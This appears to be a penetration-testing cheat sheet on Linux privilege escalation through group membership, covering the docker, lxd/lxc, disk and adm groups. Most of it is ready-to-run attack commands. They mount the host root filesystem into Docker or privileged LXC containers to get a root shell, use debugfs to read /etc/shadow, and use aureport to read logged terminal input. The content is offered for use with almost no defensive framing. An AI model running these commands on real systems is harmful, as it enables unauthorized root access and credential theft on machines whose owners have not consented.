Linux Privilege Escalation with Groups

Contains the details of the topic Privilege Escalation/Linux/Functionality/Groups.

Docker

A Docker socket is a special file that allows us and processes to communicate with the Docker daemon. This communication is done through a Unix socket or a network socket, depending on the configuration of our Docker setup. It acts as a bridge, facilitating communication between the Docker client and the Docker daemon.

• Identify where docker.sock is found (usually in /var/run).

• Check if you have docker group, docker with SUID, docker in sudoers or docker.sock is writable

• If it is not present on the host, upload docker. Download HERE.

Attack 1

docker run -v /root:/mnt -it ubuntu

Attack 2

docker -H unix://<PATH_docker.sock> ps

We can create our own Docker container that maps the host root directory (/) to the /hostsystem directory on the container. With this, we will have complete access to the host system. Therefore, we need to map these directories accordingly and use the <NAME_IMMAGE> docker image.

docker -H unix://<PATH_docker.sock> run --rm -d --privileged -v /:/hostsystem <NAME_IMMAGE>

Display container ID and access.

docker -H unix://<PATH_docker.sock> ps  # sign ID

docker -H unix://<PATH_docker.sock> exec -it <ID> /bin/bash

Attack 3

Display available docker images

docker image ls

docker -H unix://<PATH_docker.sock> run -v /:/mnt --rm -it <NAME_IMMAGE> chroot /mnt bash

LXD / LXC

Linux Containers (LXC) is an operating system-level virtualization technique that allows multiple Linux systems to run in isolation from each other on a single host, owning their own processes but sharing the host system kernel for them.

Linux Daemon (LXD) is similar in some aspects, but it is designed to contain a complete operating system. So it is not an application container, but a system container.

We must be in the lxco lxd group.

Initialization

lxd init

Import images (use those on the system or download alpine)

lxc image import alpine.tar.gz --alias alpine

Display imported list

lxc image list

Start a privileged container with the security.privileged (root user in the container equal to the root user on the host)

lxc init alpine r00t -c security.privileged=true

Mount the host file system

lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true

Generate a shell within the container instance and explore the host file system.

lxc start r00t

lxc exec r00t /bin/sh

cd /mnt/root/root

disk

All access in /dev, debugfs to access the entire file system

df -h

debugfs <Filesystem>
# see Filesystem & Mounted on

ex.

debugfs /dev/sda2
> cd /root
> cat /etc/shadow

adm

Read sensitive data in /var/log, cron jobs running, etc.

We can try with aureport

aureport --tty | less